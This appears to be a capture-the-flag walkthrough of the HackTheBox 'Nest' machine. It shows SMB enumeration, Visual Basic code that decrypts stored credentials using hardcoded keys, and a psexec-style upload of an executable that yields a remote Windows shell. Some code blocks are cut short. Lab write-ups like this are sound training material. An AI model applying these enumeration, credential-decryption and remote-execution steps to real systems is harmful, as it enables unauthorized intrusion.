~/Documents/HTB/Nest root@kali ❯ cat nmap_All.txt # Nmap 7.80 scan initiated Tue Feb 4 21:59:16 2020 as: nmap -sC -sV -oN nmap_All.txt -p- 10.10.10.178 Nmap scan report for 10.10.10.178 Host is up (0.33s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSVersionBindReqTCP, NULL, RPCCheck: | Reporting Service V1.2 | GenericLines, GetRequest, HTTPOptions, RTSPRequest: | Reporting Service V1.2 |_ Unrecognised command 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4386-TCP:V=7.80%I=7%D=2/4%Time=5E397FB6%P=x86_64-pc-linux-gnu%r(NUL SF:L,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLine SF:s,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised SF:\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20 SF:V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\n SF:HQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comman SF:d\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n SF:\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repor SF:ting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK\ SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>");
Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required |_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 4 22:30:41 2020 -- 1 IP address (1 host up) scanned in 1884.97 seconds
Nmap 显示共开放2个端口445和一个不知道是啥服务的端口。 445为SMB端口
1 2 3 4 5 6 7 8 9 10 11 12 13
~/Documents/HTB/Nest root@kali ❯ smbclient -L 10.10.10.178 Enter WORKGROUP\root's password:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk SMB1 disabled -- no workgroup available
~/Documents/HTB/Nest root@kali ❯ telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> >help debug
DEBUG <Password> Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed
Examples: DEBUG MyPassw0rd Attempts to enable debug mode by using the password "MyPassw0rd"
>
可以看到 执行DEBUG需要密码。故首先我们尝试找到密码。
User.txt
发现我们有权限访问SMB目录下DATA中的Share
1 2 3 4 5 6 7 8 9 10 11 12 13 14
~/Documents/HTB/Nest root@kali 9s ❯ smbclient \\\\10.10.10.178\\Data Enter WORKGROUP\root's password: Try "help" to get a list of possible commands.
smb: \> recurse on smb: \> prompt off smb: \> mget * NT_STATUS_ACCESS_DENIED listing \IT\* NT_STATUS_ACCESS_DENIED listing \Production\* NT_STATUS_ACCESS_DENIED listing \Reports\* getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec) getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.1 KiloBytes/sec) (average 0.0 KiloBytes/sec) smb: \>
~/Documents/HTB/Nest root@kali 26s ❯ smbclient \\\\10.10.10.178\\Secure$ -U tempuser Enter WORKGROUP\tempuser's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Aug 8 07:08:12 2019 .. D 0 Thu Aug 8 07:08:12 2019 Finance D 0 Thu Aug 8 03:40:13 2019 HR D 0 Thu Aug 8 07:08:11 2019 IT D 0 Thu Aug 8 18:59:25 2019
10485247 blocks of size 4096. 6545194 blocks available smb: \> cd IT smb: \IT\> dir NT_STATUS_ACCESS_DENIED listing \IT\* smb: \IT\> cd Carl smb: \IT\Carl\> smb: \IT\Carl\> dir . D 0 Thu Aug 8 03:42:14 2019 .. D 0 Thu Aug 8 03:42:14 2019 Docs D 0 Thu Aug 8 03:44:00 2019 Reports D 0 Tue Aug 6 21:45:40 2019 VB Projects D 0 Tue Aug 6 22:41:55 2019
10485247 blocks of size 4096. 6545194 blocks available
~/Documents/HTB/Nest/VB Projects/WIP/RU/RUScanner root@kali ❯ cat Utils.vb Imports System.Text Imports System.Security.Cryptography Public Class Utils
Public Shared Function GetLogFilePath() As String Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt") End Function
Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
Public Shared Function Encrypt(ByVal plainText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector) Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue) Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText) Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations) Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8)) Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes) Using memoryStream As New IO.MemoryStream() Using cryptoStream As New CryptoStream(memoryStream, _ encryptor, _ CryptoStreamMode.Write) cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length) cryptoStream.FlushFinalBlock() Dim cipherTextBytes As Byte() = memoryStream.ToArray() memoryStream.Close() cryptoStream.Close() Return Convert.ToBase64String(cipherTextBytes) End Using End Using End Function
Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Imports System Imports System.Text Imports System.Security.Cryptography
Public Module Module1
Public Sub Main()
Console.WriteLine(DecryptString("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")) Console.ReadLine() End Sub Public Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256) End If End Function Public Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
~/Documents/HTB/Nest root@kali 24m 48s ❯ smbclient \\\\10.10.10.178\\users -U c.smith Enter WORKGROUP\c.smith's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sun Jan 26 07:04:21 2020 .. D 0 Sun Jan 26 07:04:21 2020 Administrator D 0 Fri Aug 9 23:08:23 2019 C.Smith D 0 Sun Jan 26 15:21:44 2020 L.Frost D 0 Fri Aug 9 01:03:01 2019 R.Thompson D 0 Fri Aug 9 01:02:50 2019 TempUser D 0 Thu Aug 8 06:55:56 2019
10485247 blocks of size 4096. 6447114 blocks available smb: \> cd C.smith smb: \C.smith\> dir . D 0 Sun Jan 26 15:21:44 2020 .. D 0 Sun Jan 26 15:21:44 2020 HQK Reporting D 0 Fri Aug 9 07:06:17 2019 user.txt A 32 Fri Aug 9 07:05:24 2019
10485247 blocks of size 4096. 6447114 blocks available smb: \C.smith\> get user.txt getting file \C.smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.smith\> cd "HQK Reporting" smb: \C.smith\HQK Reporting\> dir . D 0 Fri Aug 9 07:06:17 2019 .. D 0 Fri Aug 9 07:06:17 2019 AD Integration Module D 0 Fri Aug 9 20:18:42 2019 Debug Mode Password.txt A 0 Fri Aug 9 07:08:17 2019 HQK_Config_Backup.xml A 249 Fri Aug 9 07:09:05 2019
10485247 blocks of size 4096. 6543918 blocks available smb: \C.smith\HQK Reporting\>
[*] Requesting shares on 10.10.10.178..... [*] Found writable share ADMIN$ [*] Uploading file fLgfGSwC.exe [*] Opening SVCManager on 10.10.10.178..... [*] Creating service xaOM on 10.10.10.178..... [*] Starting service xaOM..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.